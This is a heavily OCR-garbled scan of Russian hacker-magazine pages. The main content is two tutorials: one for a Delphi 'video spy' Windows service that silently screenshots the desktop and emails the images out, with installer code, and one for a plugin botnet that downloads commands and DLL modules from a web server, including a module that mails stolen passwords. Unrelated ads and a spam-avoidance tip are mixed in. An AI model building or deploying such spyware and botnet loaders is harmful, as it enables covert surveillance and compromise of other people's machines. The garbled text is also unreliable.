[инициализация] Что ж, пришла пора нам реализовать 
ЗегѵісеМаіп-функцию. И первое, что мы должны в ней сделать, — 
создать и инициализировать все переменные, используемые в 
дальнейшем. Начнем, пожалуй, со структуры МуЗегѵісеЗГаГиз, 
нужной для регистрации сервиса в системе. У нее семь пара- 
метров, и все мы должны заполнить. 

ЭмЗегѵісеТуре — тип сервиса. У нас шпион самый обычный, без 
выпендрежа, поэтому нас устроит значение 5ЕРѴІСЕ_\Л/ІІ\І32. 
ЭмСиггепГЗГаГе — текущий статус сервиса. Так как нам предсто- 
ит долгая инициализация, установим пока это значение в ЗЕР- 
ѴІСЕ_5ТАРТ_РЕІ\ЮІІ\І0 (в режиме ожидания). 

ЭмСопГгоІзАссерГесІ — параметр, определяющий, какие события 
от системы будет принимать сервис. Давай позволим пользовате- 
лю останавливать и ставить сервис на паузу (5ЕРѴІСЕ_АССЕРТ_5ТОР 
ог5ЕРѴІСЕ_АССЕРТ_РАІІ5Е_СОІ\ІТІІ\ІІІЕ), мы же не изверги, верно? 
Э\л/\Л/іп32ЕхіТСосіе, сКл/ЗегѵісеЗресіІісЕхіГСосІе — коды ошибок. У 
нас никаких ошибок пока нет ;), поэтому забиваем оба парамет- 
ра нулями. 





0\л/СИескРоіпі — текущее сос- 
тояние выполнения процесса. 
Это значение надо периодичес- 
ки увеличивать и сообщать об 
этом системе (ЗѳТЗегѵісеЗТаТиз), 
иначе система решит, что сер- 

ЭмѴѴаііНіпі — время в миллисекундах, в течение которого систе- 
ма ждет обновления статуса сервиса. Тут есть интересная фиш- 
ка. Если поставить б\л/\Л/аііНіпі:=0, то можно будет не париться по 
поводу увеличения сКл/СИескроіпі. Нам лишний геморрой ни к че- 
му, поэтому так мы и сделаем. 

Заполнив структуру, надо зарегистрировать с ее помощью наш 
сервис визуального наблюдения: 

МуЗегѵісеЗіаШзНапсІІе:= ВедізіегЗегѵісеСігІНапсІІег( 
'ОигѴісІеоЗруЗегѵісе', @ МуЗегѵісеСігІНапсІІег); 

В качестве параметров здесь передаются имя сервиса, заданное 
при заполнении ЭізраТсІпТаЫе, и указатель на ПапсІІег-функцию. 
Мы определили его статус как 5ЕРѴІСЕ_ЗТАРТ_РЕІ\ЮІІ\І0, поэтому 
он пока находится в состоянии ожидания. Запустить его на пол- 
ную катушку можно будет лишь после инициализации остальных 
переменных, которые понадобятся нам уже для реализации, 
собственно, самого визуального наблюдения. 

Смело объявляй в ЗегѵісеМаіп следующие переменные: 

сіезк: [ЮС; 

ЬтЗсгееп: ОгарЫсз.ТВіГтар; 

Іред: "ІМРЕОІтаде; 
зтір: ТісІЗМТР; 
тез: ТісІМеззаде; 
аКасІі: ТІсІАКасіитіепІ; 

Первая переменная будет содержать хэндл контекста устрой- 
ства — значение, которое понадобится в дальнейшем для полу- 
чения снимка рабочего стола. Следующие две переменные не- 
обходимы для хранения оригинала снимка и его сжатой версии. 
А с помощью зпгіір мы будем отправлять сообщение тез, к кото- 
рому прикрепим аттач в виде переменной типа ТІсІАііасІптепі. 
Кстати, если ты обратишь внимания на типы переменных, то заме- 
тишь, что я не стал писать сервис исключительно на ѴѴіпАРІ. При- 
чин тому есть несколько. Во-первых, это кошмарный формат 
^Е0, без которого не удалось бы по-человечески сжать скрин- 
шот. Реализовать сжатие — это своего рода мазохизм, поэтому 
если есть возможность, то надо этого избежать. Что я, собствен- 
но, и сделал. Во-вторых, это нежелание реализовать собствен- 
ный зтір-движок, так как протокол 5МТР сложный, можно наде- 
лать много ошибок, отлавливать которые очень непросто. Отправ- 
ка почты у нас будет осуществляться также с помощью стандарт- 
ного компонента ТісІЗМТР. Поэтому, помимо модулей 0гарИісз и 
^Е0, в изез мы должны добавить ІсІЗМТР. 

Естественно, что использование компонентов ЭеІрПі в программе 
очень неприятным образом отразится на ее размере. Поэтому 
было бы логично заметить, что для распространения шпиона (ко- 
торым, между прочим, я тебе строго-настрого не рекомендую за- 
ниматься) куски, использующие возможности среды, надо пере- 
писать на чистом АРІ. 

Ладно, вернемся к нашей инициализации. Нам надо вызвать 




В случае если пользова- 
тель не залогинен в систе- 
ме, функция 

ѲеЮезкіорУѴіпбоѵѵ вернет О 
и скриншот придет пустой. 
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ЕІгфіуілЫіШ [ЬЫпШл'ііСі ІИ Ініг-ѵііг^т ішіжііішшч ііЖіі 

ІіііргуллыпігП выделенный сер пер но вшчешігоелш ішшіо- 

тчем фишчеснйыу серверу. 

Ѵ|*5 ЭК0Л4НН I іНІІІ-НІ 

Виргуа/н.иый выделенный сервер яплястсн: неюрм іт ре- 
шением дл* пмьччнтелсИ, «вдюшн* киттрист просты* 
треЧіук-ццнс особыя настроек гтр^іМІШ 
ЕЧіли едііт еі 1 р._е,ЕТік ниріудлмлш» хткгпшпа, и ему гре- 

бу мтся болы пне щмцшш и ічѵіыіенс серверные рсеур- 
сы.тооггпшйЛиішг вііішрсйі ни шетнниенню иска- ггроігши- 
днійЛьмисггь будет аренда Ѵ№3. ВнргудііьЕсын выделенный 
сервер тюіішлмт лпшп и пернол отладки круп- 

ных проектов, рачыеінаеыик впекледегвнн ш НУВСЛСННЫХ 
серверах. Ѵ[М пптноянт суніеетяслпст сократи. іатрапіі 
мри отладке раелре. іелеііш.іх гіргишллЕнн. Стоимость ■орен.ш 
ѴІЭЙ а нссішдью рал ниже стоимости аренды выделенного 
сервера. 

Ѵ05 ІІ(№І№«№ПІСІ ЙЙЛЬШИё Н1ЧСЖНОЛ Н ЙІІ> (ріННШПІШ 

с внртѵальнич хосінін ш 

■ ѴЮнм№і свои ирамомы. лопыокіслсік и іфБіостшляет 
полный пкН-доеіуп; 

- Щ имеет собственны? ІР-алрссз, норна: 

- VI >4 может иметь собственные шлфіЕіурлзиЕоіЕнз.іе файлы 

Л прагртммные лріщщкч; НО^ІЬТОЕШГ(1*ЕЬЕІЧіееі'№Ч.МІ>ЖІШ- 

егьсічлииііі собс] венные версии анлемны?; библиотек или 
нчлясня г ь еуі]|еі"гв>тоіц.і іс; 

- гііале.тен ѴУЙ МпжгГ ИтжПягь любые фіАлм» йНякная ми- 
лы в іолошшп н Других служебных днрсіатлрНлХь л іакже 

ѴЬТ ^РІШЬЧ ИШІ ІГ:І Г ІІ^ ІЧ І?.Е^-ЦМИ|. .4 КЧТН-НЦ ДоСТуПНМ 11|>П- 

граммим ябеег іечн ше; 

-Ѵ05 имеет минимальны? гфшгтнрованньк ресурсы НАМ. 
СРУ, и іюччнятсіъ нсполъзоіштъ ксотшышерссзгрсы 
сервера. 

Услуг и Ѵ&5. нрсдисглиляемме кігмгшшіеіі имею г твою 
особен мосты Вест Хистилт І№ оГраКИЧНЁМТ ііеілыіііштс- 
ііеіі (іііІлОсірс опсраіліошійй СИСТЕМЫ, 

івт . ноетше 

тад, (095) 788-М-М 

ЩЩЩ .Ъѵ<-%Н>І1І^, |Ц 
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[ТЗЕВѴІСЕ] 

В йеірііі невероятное количество разных классов и 
компонентов. В том числе есть компонент для быстрой 
разработки сервисов. О нем уже писал Ноггіііс в Ха 
№6.2004. Использование его наверняка сильно упрос- 
тило бы работу над нашим видеошпионом, но не дало 
бы такого полного представления о работе сервисной 
системы в ѴѴіпсІоѵѵз. За счет того, что мы написали 
сервис в ОеІрИі на чистом АРІ, у нас теперь не должно 
возникнуть никаких трудностей при переписывании 
его на Си или ассемблере. 



конструкторы для всех переменных, объявленных выше, кроме 
хэндла и аттача. Хэндл — это не класс, а просто дескриптор, 
у него вызывать и настраивать нечего. А аттач мы будем иници- 
ализировать позже, уже в процессе работы шпиона, так как в 
его конструкторе надо указать адрес прикрепляемого файла, 
а мы его узнаем лишь после сохранения снимка рабочего 
стола в файл. 

[примеры вызовов конструкторов] 

Ьт5сгееп:=ОгарЫсз.ТВіітар.Сгеаіе; 

Іред:=ТиРЕОІтаде.Сгеаіе; 

тез:=ТІсІМе55аде.Сгеаіе(піІ); 

зтір:=ТІсІ8МТР.Сгеаіе(піІ); 

Создав объекты, мы должны настроить их параметры. 

У битмапа надо выставить размер экрана. Его можно получить 
с помощью функции СеіЗузіетМеігісз, скармливая ей сначала 
5М_СХ5СРЕЕІ\І (для получения ширины экрана), а потом 
5М_СѴ5СІ?ЕЕІ\І (для высоты). 

Будущему ЗМТР-соединению мы должны указать зтір-сервер, ло- 
гин и пароль на нем, а также тип аутентификации (аНодіп). 

В параметрах сообщения мы укажем, куда слать снимки рабоче- 
го стола и как оформлять письмо. 

Если есть желание, можно также выставить качество сжатия ^Е0 
поменьше. Если не трогать стандартных размеров (1024x768), 
скрин занимает где-то 150-200 Кб. 

После инициализации всех возможных переменных следует из- 
менить значение текущего состояния сервиса, расположенного 
в переменной МуЗегѵісеЗіаіиз, на 5ЕРѴІСЕ_РІІ[\ІМІІ\І0 и сообщить 
об этом системе: 

Му8егѵісе8іаШз.сІѵѵСиггепі8іаіе:= 8ЕВѴІСЕ_ВІІІ\ІМІІ\Ю; 
ЗеіЗегѵісеЗіаШз (МуЗегѵісеЗіаіизНапсІІе, МуЗегѵісеЗіаіиз); 

[камера! мотор!] Основной код сервиса мы будем выполнять 
в цикле в ЗегѵісеМаіп-функции после инициализации всех пере- 
менных. Я не придумал ничего более оригинального, чем сделать 
цикл бесконечным (вообще-то, так делать нельзя, лучше какую- 
нибудь переменную-флаг ввести, а не ігие писать. — Прим. Горлу- 
ма.:) \л/ГііІе ігие сіо. 

В задачи основного кода входит получение свежего снимка ра- 
бочего стола, сжатие его и отправка по заданному в парамет- 
рах переменной пгіезз адресу. Каждый момент мы рассмотрим 
подробно. 

Снять скриншот с рабочего стола — это, наверное, самое прос- 
тое во всем сервисе визуального наблюдения. Делов-то — две 
строки. Сначала получаем хэндл контекста устройства (пом- 
нишь, мы переменную сіезк объявляли?). Делается это с по- 
мощью функции 0еЮС, которая по хэндлу окна выдаст хэндл 
контекста устройства (хэндл окна десктопа получается с по- 
мощью 0еЮе5кіор\Л/іпсІо\л/). Этот контекст позволит получить дос- 
туп к изображению рабочего стола. А затем с помощью функции 
ВіШ полностью копируем изображение в наш буфер ЬтЗсгееп: 

ВіІВІІ(ЬтЗсгееп.Сапѵаз.НапсІІе, 0, 0, ЬтЗсгееп.ѴѴісШі, 

ЬтЗсгееп.Неідіи сіезк, 0, 0, ЗВССОРѴ); 

Для того чтобы ужать изображение (не хочешь же ты получать по 
1,5 Мб, если можно 200 Кб), запишем его в переменную іред ме- 
тодом Аззідп, а затем сохраним в файл методом ЗаѵеТоЕіІе. 
Полученный файл прикрепим к письму с помощью переменной 
аііасИ, в конструкторе которой мы укажем, к какому письму ка- 
кой файл присоединять. 




[в процессе работы :)] 

[рабочий код сервиса] 

сІезк:=ОеЮС(ОеЮезкіорѴѴіпсІоѵѵ); 

ВіІВІІ(ЬтЗсгееп.Сапѵаз.НапсІІе, 0, 0, ЬтЗсгееп.ѴѴісІЩ, 

ЬтЗсгееп.Неідіи сіезк, 0, 0, ЗВССОРѴ); 

фед.АззідпфтЗсгееп); 

фед.ЗаѵеТоРіІе^ЛзсгеепзІіоІ.ірд 1 ); 

аНасІт:=ТІсІА«асІітепЕСгеаіе(тезз.МеззадеРагіз, І С:\зсгеепзІтоЕ]рд І ); 

ігу 

зтІр.СоппесІ(-І); 

ехсері 

зІеер(ЗОООО); { полминуты } 
сопііпие; 

епсі; 

зтір.8епсІ(тез); 

зтір.ОізсоппесІ; 

аКасІі.Ргее; 

{ пауза между итерациями — две минуты } 
зІеер(2*60000); 

[установка] РІаш видеошпион закончен. Осталось только устано- 
вить его в систему и наслаждаться результатом его работы. Прав- 
да, для установки сервиса в систему, как это ни прискорбно, пот- 
ребуется еще одна программка, разработкой которой мы сей- 
час и займемся. 

Все сервисы, запускаемые при старте ѴѴіпсІоѵѵз, загружаются 
специальной системой, называемой ЗСМ (Зегѵісе СопігоІ 
Мападег). Для взаимодействия с этой системой есть ряд функ- 
ций, которыми нам предстоит манипулировать. 

Первая — ОрепЗСМападег, функция, которая откроет ЗСМ и по- 
лучит определенные права доступа для работы с сервисами. Ей 
передается имя машины, имя базы данных сервисов (оба пара- 
метра для локальных компьютеров — піі) и права доступа. Мы не 
будем скромничать и попросим в нашем установщике макси- 
мальных прав — ЗС_МА1\]А0ЕР_А1_1__АССЕЗЗ. Если не произошло 
никаких ошибок, функция вернет нам хэндл ЗСМ'а, без которого 
работа с сервисами невозможна. 

Открыв ЗСМ, мы должны создать в нем наш сервис визуального 
наблюдения. Делается это функцией СгеаіеЗегѵісе. Параметров 
у нее достаточно, опишу лишь ключевые. 

ИЗСМападег : ЗС_НАІ\ЮІ_Е — хэндл ЗСМ'а, который получили выше. 
ІрЗегѵісеЫате : зігіпд — имя сервиса. 

ІрОізрІауЫате : зігіпд — видимое пользователю название сервиса. 
сіѵѵОезігесІАссезз : сагсііпаі — запросы, на которые будет отвечать 
сервис. Я использовал 5ЕРѴІСЕ_АІ_І__АССЕ53, но если ты совсем ни- 
кого не любишь, то можешь оставить только ЗЕРѴІСЕ_ІІ\ІТЕРРО0АТЕ. 
с!\л/5егѵісеТуре : сагсііпаі — тип сервиса. Поскольку наш шпион — 






[один из способов удаления юнитов — через менеджер проекта] 



это интерактивный сервис, то есть ему требуется доступ к ра- 
бочему столу, к обычному значению типа сервиса 
ЗЕРѴІСЕ_\А/ІМ32_0\А/М_РР0СЕ53 мы должны дописать «ог ЗЕР- 
ѴІСЕ_ІМТЕРАСТІѴЕ_РРОСЕ35». 

ІрВіпагуРаІГіІХаппе : зігіпд — путь до исполняемого файла сервиса. 
Остальные параметры функции нас совершенно не касаются, 
поэтому мы заполняем их піГами. 

Остается только выполнить функцию и можно считать, что наш ви- 
деошпион полноценно установлен в системе. Функция вернет 
хэндл созданного сервиса. Его ты можешь использовать для 
дальнейшей конфигурации или удаления сервиса, а можешь во- 
обще не трогать от греха подальше. 

По окончании работы с сервисом (но не по окончании работы само- 
го сервиса) хэндл придется закрыть функцией СІозеЗегѵісеНапсІІе. 
Если вдруг тебе захочется удалить нашего шпиона из системы, 
то используй функцию ОеІеіеЗегѵісе. Параметром ей надо пе- 
редать хэндл, возвращаемый функцией СгеаіеЗегѵісе. Как его 
получить, если ты уже все закрыл? Для этого есть функция 
ОрепЗегѵісе, которая по названию сервиса вернет его хэндл. 

[вместе веселее] Хороший получился шпион, только сырой нем- 
ного. У него есть масса мелких недостатков. Но если их устра- 



нить, то хоть на прилавок выкладывай. К примеру, из-за того что мы 
использовали в проекте стандартные компоненты ОеІрПі, экзеш- 
ник сервиса страшно разросся. 

Плюс все письма будут с одинаковыми ЗиЬіесі'ами — разобрать- 
ся, какой скрин когда снят, будет сложновато. И т.д. и т.п. В об- 
щем, нет предела совершенству. Если тебе понравилась идея ви- 
деошпиона и ты хочешь ее развивать — пиши. Возможно, вместе 
у нас получится что-нибудь потрясающее © 



[Т ірг&Тгіскз] 

Хочешь увидеть свои советы в журнале? Присылай их на адрес 8кІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тірз&Тгіскз Иван Скляров. ) 

Если ты ѵѵеЬ-мастер, то знаешь, как много будет спама приходить на 
ящик, если сделать на страницах сайта прямую ссылку на свой е- 
таіі. Так вот, защититься от спама можно с помощью ^ѵаЗсгірІ 
Вставляем в код НТМІ_-документа следующее: 

<зсгірІ Іапдиаде="іаѵазсгірГ> 
ѵаг пате = "Іодіп"; //Твой логин 
ѵаг сіотаіп = "хзесіог.сіс.ги"; // Домен почты 
Г Выводим это дело на экран 7 
боситепІміІе(пате + + сіотаіп); 

</зсгірЬ 

В примере выше мы вывели адрес электронной почты как текст, а 
использовать его как ссылку можно так: 

<зсгірІ Іапдиаде="іаѵазсгірГ> 

ѵаг пате = "Іодіп"; 

ѵаг сіотаіп = "хзесіог.сіс.ги"; 

боситепІлл/гіІе('<а іігеІ="таіІІо:' + пате + + сіотаіп + '">0братная 

связь</а>'); 

</зсгірЬ 

Кстати, такое дело можно использовать и на РНР, ѴВЗсгірІ и вообще 
в любом ЯП. 

2-ЗІуІ_е ака Отверженный Е-таіІ: иХг0616гРкд@уапсІех.ги ГіНр://хзес1:ог.сІс.ги 
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ЕШАЛДООК ПР€ДАС4Н а і№ 
" й НАЕЛ 1 * ЦА. ГѴСЛі Л>0 Ч Е КИІ 



Подключение - от 40 у.е 

Минимальная месячная плата - 5 у.е. 

Срок подключения - 14 дней -ідга Москвы | 

Специальные Скидки дли эбОнентоэ @ жилык домах 

Организаций ритуальных часіны* сетей іѵрмі 

Круглосуточная техническая поддержка 

Аренда оборудовании для абонентов - бесплатна 

Виртуальный и физический костинг 

Шр-сересрое - график не ограничен 

Электронная почта для абонентов - бесплатно 

"ЛМснуег ргрхгінчшні 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕПНЫМ НЬЮСЫ 






ж ш \а ^ С/С++ 

Умный ботнет 



ОСНОВНЫМ НЕДОСТАТКОМ СОВРЕМЕН- 
НЫХ РІІВЫС-БОТНЕТОВ ЯВЛЯЕТСЯ ПОЧТИ 
ПОЛНАЯ НЕВОЗМОЖНОСТЬ ДОБАВЛЕНИЯ 
В СЕТЬ НОВОЙ ФУНКЦИИ, сложность 
ДАЖЕ НЕ В МОДИФИКАЦИИ ИСХОДНОГО 
КОДА БОТА — С ЭТИМ СПРАВИТСЯ ЛЮБОЙ 
БОЛЕЕ-МЕНЕЕ ПРОДВИНУТЫЙ КОДЕР, А В 
ЕГО ПЕРЕУСТАНОВКЕ. ЕСЛИ АДМИНУ ДЛЯ 
ЭТОГО НАДО ОБЕЖАТЬ ВСЕ МАШИНЫ В 
СЕТИ, ТО ХАКЕРУ ОБЫЧНО ПРОЩЕ СОБ- 
РАТЬ НОВУЮ СЕТЬ. ТАКИХ ПРОБЛЕМ НЕ 
СТАЛО БЫ, БУДЬ БОТНЕТ ПЛАГИННЫМ С 
ДИНАМИЧЕСКОЙ ПОДКАЧКОЙ МОДУЛЕЙ 

I Пѳтя и Волк (ІСО#135511) 



Просто, но со вкусом 
о создании 
плагинного ботнета 




На диске, как всегда, ты 
найдешь полный исходный 
код программы, описанной 
в статье. 




Отличным примером хакерс- 
кого ботнета является рбаі- 
Ьоі. Модульный бот с огром- 
ным количеством функций. 
В р2р-сетях уже давно 
валяются исходники этого 
монстра, занимающего аж 
59 мегов! Мизі Ііаѵе. 




Подробнее о скачивании 
файлов из Сети с помощью 
ѴѴіпІпеі АРІ ты можешь про- 
честь в М5Ш; 
Шр://шзсІп.тісгозоП.сот/ІіЬ 
гагу/еп-ив/ѵѵіпіпеі/шіпіпеі/ 
и5іпд_\л/іпіпеі.а5р. 



Ботнет — это распределенная сеть ботов. Чем различаются бот и 
какой-нибудь РАТ (Ретоіе Асітіпізігаііоп ТооІ)? По возможностям, 
пожалуй, ничем. А по принципу управления отличия кардинальны. 
Обычно ты командуешь одной ВАТ за раз - скопировать/пере- 
местить/удалить/настроить - все на одной машине. Если машин 
пять сотен, и на каждой надо, например, поправить какие-нибудь 
настройки? Стандартными способами тут уже не обойтись. Поэ- 
тому и были придуманы боты, фактически те же РАТ, только управ- 
ляемые сервером. Скомандовал сервер: «Всем выключиться», 
все и выключились. Не надо к каждой машине коннектиться и объ- 
яснять, в чем дело и что делать. 

Такой подход, надо признать, невероятно удобен всем. Админам 
— одновременно все компьютеры в локальной сети настраивать, 
хакерам — управлять ООоЗ'ом и перебирать пароли, физикам- 
математикам — что-нибудь обсчитывать глобальное (ведь расп- 
ределенные вычисления из той же оперы). Задачи у всех разные, 
на них останавливаться я не стану. Я просто постараюсь объяс- 
нить, как можно написать универсальный бот, который сможет 
удовлетворить (гусары, молчать!) потребности любого человека. 




способного написать примитивную дина- 
мическую библиотеку. Я расскажу, как 
сделать плагинный ботнет. 

[команды] Самый простой способ управ- 
лять кучей ботов — это заставить их самих 
скачивать команды с \л/еЬ-сервера раз в 
какое-то время. Зарегался, скажем, на 
бесплатном хостинге, положил туда текс- 
товой файл с командами. А бота написал 
так, чтобы он все время этот файл скачи- 
вал, парсил и выполнял. В принципе, так 
должно быть. Но только есть одна пробле- 
ма: бот должен знать все команды, опи- 
санные в файле. Если он что-то не знает, то 
просто не выполнит. Логично. Угадать за- 
ранее, какие от бота потребуются функ- 
ции, практически невозможно, так как пот- 
ребности постоянно меняются (бывает да- 
же, что админ становится хакером). Сле- 
довательно, надо иметь возможность уда- 
ленно, уже после установки ботнета, до- 
бавлять/менять/удалять функции бота. Зву- 
чит страшно, но на самом деле все еще 
страшнее ;). 

Пусть, к примеру, у нас есть самый обыч- 
ный бот, который только и умеет, что пинго- 
вать заданный адрес да выводить пользо- 
вателю сообщение. Командный скрипт 
для него может выглядеть следующим об- 
разом: 

теззаде Сообщение от бота! 

ріпдасісіг ѵѵѵѵѵѵ. хакер. ш 

Такой бот поддерживает всего две коман- 
ды: теззаде и ріпдасісіг. И ничего другого 
он не поймет. А должен. Надо поправить 
его таким образом, чтобы его можно было 
бы обучать новым командам прямо из 
скрипта. Оказывается, делается это всего 
лишь внедрением более или менее снос- 
ной плагинной (сервисной) системы и но- 
вой команды /оас/, которая бы скачивала 
модули с остальными командами. 

С таким лоадом от реализации других ко- 
манд в самом боте можно отказаться во- 
обще, так как их всех можно будет засу- 
нуть в плагины. 

Командный скрипт для бота с такой систе- 
мой преобразуется в нечто следующее: 

Іоаб теззаде Ііир://зегѵег.ги/теззаде.сІІІ 

ІоасІ ріпд Ііир://зегѵег.ги/ріпд.сІІІ 

теззаде Сообщение от бота! 

ріпдасісіг ѵѵѵѵѵѵ.хакер.ги 

По идее, вначале прога скачивает модули, 
выполненные в виде динамических библи- 
отек, а затем выполняет команды, зашитые 
в них. При этом никто не мешает ботмасте- 
ру написать еще тьму 0\±, реализующих 
его самые разные задумки. Захочет — на- 
пишет модуль, отправляющий пароли на 
мыло, добавит в скрипт пару строк и будет 
радоваться. 

ІоасІ зепсіразз ІіНр://зегѵег.ги/зепсІразз.сІІІ 

зепсіразз зотетаіІ@ѵегу-ѵегу-ітрогІапЕІіт 

Заинтересовал? Тогда можно приступать к 
разработке этого счастья. 

[пишем бот] Бот может управляться отнюдь 
не только с \л/еЬ-сервера, просто управле- 
ние с веба — самое простое в реализа- 
ции. Тут не надо изучать протоколы (как в 



случае с ІРС) и писать сложные програм- 
мы. Скачал скрипт с помощью \л/іпіпеі и 
знай себе, парси его. 

Пользоваться АРІ для скачивания в данном 
случае очень легко: 

Ш получаешь дескриптор сессии \л/іпіпеі с 
помощью ІпіегпеіОреп ; 

\2\ открываешь урл — ІпіегпеЮрепіІгІ; 

[з] сливаешь все содержимое урла в бу- 
фер функцией ІпТегпеТНеасІПІе. 

Получив скрипт, надо разобраться, что в 
нем и как. Я предлагаю для начала разбить 
его на строки. Это можно было бы сделать с 
помощью обычной функции зігіок, указав ей 
в параметре разделители «\п\г». Но у меня 
она доверия не вызвала, поэтому я сам ре- 
ализовал парсинг. Получились, правда, две 
функции вместо одной: РагзеІпіТ и РагзеЗТгіпд. 
Одна инициализирует парсинг, другая по- 
лучает указатели на метки разбиения. Но 
это не суть важно, главное — разбить скрипт 
на строки, а затем выделить в них первое 
слово — команду. 

[команда] [строка аргументов] 

Как ты уже понял, синтаксис скриптов у ме- 
ня используется простой, поэтому первое 
слово можно выделить, просто скопиро- 
вав из строки все символы от начала и до 
первого пробела. 

Получив имя команды, надо посмотреть, за- 
регистрирована ли она у нас, и если да — 
выполнить. В коде все это выглядит следую- 
щим образом (згРадеВи^ег — буфер со 
скриптом): 

сііаг *зѳр = "\п\г м ; 

сііаг *1іт = згРадеВиЯег + ІзігІеп(з 2 РадеВиЯег); 

сііаг Чокеп; 

сііаг *соттапсІ = 0; 

сііаг іетр[256]; 

// инициализируем парсинг 

іокеп = Раг5еІпіІ(52РадеВиКег, зер, Ііт); 

(Кокеп) геШгп РАІ_ЗЕ; 

// делим на строки 

сіо { 

// копируем строку и делим 

// на команду и аргументы 

Ізігсру(іетрДокеп); 

соттапсі = ОеіРігзіЗрасе(іетр); 

й(соттапсІ != 0) *(соттапсІ-1) = 0; 

// запускаем сервис 
\\ (ІзВоЩеіЗегѵісе(іетр)) 



ОеіВоіпеіЗегѵісе(іетр)(соттапсІ); 

} ѵѵііііе (Іокеп = РагзеЗігіпд(іокеп, Ііт)); 

Ты заметил функции ІзВоіпеіЗегѵісе и 
ОеТВоТпеТЗегѵісе'? Это самое интересное. 
Сервисом я обозвал структуру, состоящую 
из имени команды и адреса функции, обра- 
батывающей аргументы этой команды. Ма- 
нипулируя такими структурами, бот будет 
определять, когда какой код выполнять и т.п. 
Объясню. 

У меня есть массив элементов ВоТпеТЗегѵісе: 

іуресіеі ВООІ_ (ѴѴІЫАРІ *ЗегѵісеРагзег) 

(РЗТРІ згЗігіпд); 
іуресіеі зігисі _3егѵісе { 

сііаг 32Ыате[128]; 

ЗегѵісеРагзег зрРипс; 

} ВоіпеіЗегѵісе; 

В структуре 52/Ѵате — это имя сервиса 
(команды), а зрГипс — указатель на функ- 
цию-парсер сервиса. Когда скрипт пар- 
сится, первое слово в строке проверяется 
на присутствие в массиве имен сервисов. 
Если оно там есть, то с помощью 
ѲеіВоіпеіЗегѵісе возвращается функция- 
парсер для команды с таким именем, а за- 
тем запускается с параметром — строкой 
аргументов. По-русски вышесказанное 
звучит так: бот проверяет, знает ли коман- 
ду, написанную в строке, и если знает — 
выполняет ее. 

Чтобы бот понимал новую команду, нужно 
внести соответствующую новую запись 
(имя команды и адрес функции) в массив. 
Для удобства это действие я засунул в 
функцию ІЗедізТегВоТпеТЗегѵісе. Она найдет 
пустое место в массиве и аккуратно за- 
пихнет в него данные о сервисе. Использо- 
вать ее очень легко, к примеру, регистра- 
ция команды ІоасІ (о ее реализации — ни- 
же) выглядит вот так: 

ЕІедізіегВоіпеіЗегѵісеС'ІоасГ, 

БоасІЗегѵісеРагзег); 

На случай, если захочется убить или поме- 
нять сервис, я также ввел функцию 
ІІпгедізІ'егВо І'пеІ'Зегѵісе . 

Для того чтобы понять принцип действия 
сервисной системы бота, нужно осознать, 
что собой представляет функция-парсер. 
Попытаюсь объяснить, что же это такое. 
Когда бот встречает знакомую команду в 
скрипте, ему надо выполнить некоторые 
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[ЕпігуРоіпі бота — гружу библиотеки 
и регистрирую основные команды] 

действия. Увидев, к примеру, теззоде, бот 
должен вызвать функцию МеззодеВох с оп- 
ределенными параметрами. Увидев /оас/, 
— должен скачать и запустить модуль. И 
так далее. Все эти действия надо офор- 
мить в функцию, которую я окрестил функ- 
цией-парсером. Сложность понимания, 
видимо, тут заключается в двух вещах. 

Ш Парсеру передается строка. Что это за 
строка? Это аргументы! Это то, что идет в 
скрипте вслед за именем команды. В слу- 
чае с теззаде это просто выводимое со- 
общение. 

Ш Как ѲеіВоіпеіЗегѵісе возвращает функ- 
цию? Разве можно возвращать функцией 
функцию? Еще как можно! Когда в Си речь 
идет о функции, имеется в виду ее адрес. 
Вот и в массиве лежат, и ѲеіВоіпеіЗегѵісе'ом 
возвращаются как раз адреса, а не сами 
функции. Хотя свойствами они обладают те- 
ми же — к примеру, можно их запускать. Чем 
я, собственно, и занимаюсь в этой строке: 
ѲеіВоіпеіЗегѵісе(іетрХсоттопсІ). 

Первые скобки —аргументы функции поиска 
сервиса, вторые — аргумент для возвращен- 
ной функции-парсера. 

[модули и команда ІоасІ] Ради чего был 
весь этот сыр-бор с сервисами? Исключи- 
тельно ради плагинности ;). 

Модуль может обучить ботнет новой ко- 
манде, только если в ядре бота есть нор- 
мальная сервисная система. Ее мы реали- 
зовали. Осталось понять, что такое модули 
и как их подгружать к ботнету. 

Итак, модуль, он же плагин, — это, как при- 
нято у взрослых, ЭИ, динамически подгру- 
жаемая библиотека. В ней должен содер- 
жаться код, обучающий ботнет новым ко- 
мандам, имя сервиса и функция-парсер. 
Чтобы код не обломался и сделал все, что 
от него требуется, ему надо объяснить, где 
находятся функции для работы с массивом 
сервисов (они ведь в ядре бота, модуль о 
них ничего не знает). Самый простой спо- 
соб это сделать — просто передать биб- 
лиотеке адреса функций в параметрах не- 
кой экспортируемой функции. В ней надо 
сохранить адреса для дальнейшего ис- 
пользования и зарегистрировать (если это 
планировалось) новый сервис. В коде та- 
кая функция выглядит очень просто: 

сіесізрес(сіііехрогі) ВООІ_ ѴѴІЫАРІ 

ІпііМосІиІе ( 

ВООІ_ (*а)(сІіаг *, ВегѵісеРагзег), 
ВегѵісеРагзег (*Ь)(сІіаг*), 

ВООІ_ (*с)(сііаг *), 

ВООІ_ (*сІ)(сІіаг *)) 

{ 

ВедізіегВоіпеіВегѵісе = а; 
ѲеіВоіпеіЗегѵісе = Ь; 

ІзВоіпеіЗегѵісе = с; 
ІІпгедізіегВоіпеіЗегѵісе = сі; 



ВедізіегВоіпеіЗегѵісеС'теззаде", 
МеззадеЗегѵісеРагзег); 
геіигп ТВІІЕ; 

} 

// Функция-парсер для команды теззаде 

ВООІ_ ѴѴІЫАРІ МеззадеЗегѵісеРагзег 

(РЗТВ згЗігіпд) 

{ 

МеззадеВох(0,323ігіпд,323ігіпд,0); 
геіигп ТВІІЕ; 

} 

Подгружаем модуль к каждому боту в сети, 
передаем адреса сервис-функций через 
ІпііМосІиІе, регистрируем новую команду. 
И все, дело сделано: обучили ботнет чему- 
то новому. Одно только «но» — как подгру- 
жаема? Ведь я так и не показал, как реа- 
лизовать команду ІоасІ, так активно юзае- 
мую в начале статьи. Сейчас исправлюсь. 
ІоасІ должна иметь два параметра: имя 
модуля в системе и линк, откуда этот мо- 
дуль можно скачать. Опираясь на это, на- 
до написать функцию-парсер. Она отде- 
лит параметры, скачает нужный модуль с 
линка, запишет его в реестре, подгрузит к 
боту, а затем найдет и запустит ІпііМосІиІе. 
Честно говоря, в итоге получается доста- 
